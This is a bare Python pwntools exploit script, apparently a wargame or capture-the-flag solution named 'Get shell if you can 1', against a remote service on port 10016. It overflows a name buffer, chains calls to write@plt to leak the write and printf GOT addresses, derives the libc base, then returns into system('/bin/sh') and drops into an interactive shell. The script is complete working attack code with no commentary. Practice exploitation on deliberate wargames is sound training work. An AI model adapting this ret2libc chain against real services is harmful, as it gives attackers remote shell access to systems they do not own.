Get shell if you can 1
from pwn import *
#context.log_level = 'debug'
s = remote("wargame.kimtae.xyz", 10016)
lib = ELF("./libc6-i386_2.23-0ubuntu5_amd64.so")
main = 0x08048676
write_plt = 0x080484B0
write_got = 0x0804A024
printf_got = 0x0804A010
pay = "A" * 38
pay += p32(write_plt)
pay += p32(main)
pay += p32(1)
pay += p32(write_got)
pay += p32(4)
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
s.sendline("1")
s.recvuntil("Enter Memo : ")
s.sendline("a")
data = u32(s.recv(4))
pay = "A" * 38
pay += p32(write_plt)
pay += p32(main)
pay += p32(1)
pay += p32(printf_got)
pay += p32(4)
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
s.sendline("0")
s.recvuntil("Enter Memo : ")
s.sendline("a")
data1 = u32(s.recv(4))
print "[+]write got : ", hex(data)
print "[+]printf got : ", hex(data1)
libc_base = data - lib.symbols['write']
system = libc_base + lib.symbols['system']
binsh = libc_base + list(lib.search('/bin/sh'))[0]
print "[+]libc base address : ",hex(libc_base)
print "[+]system address : ",hex(system)
print "[+]/bin/sh address : ",hex(binsh)
pay = "A" * 38
pay += p32(system)
pay += "BBBB"
pay += p32(binsh)
s.recvuntil("Enter name : ")
s.sendline(pay)
s.recvuntil("Enter size : ")
s.sendline("0")
s.recvuntil("Enter Memo : ")
s.sendline("a")
s.interactive()
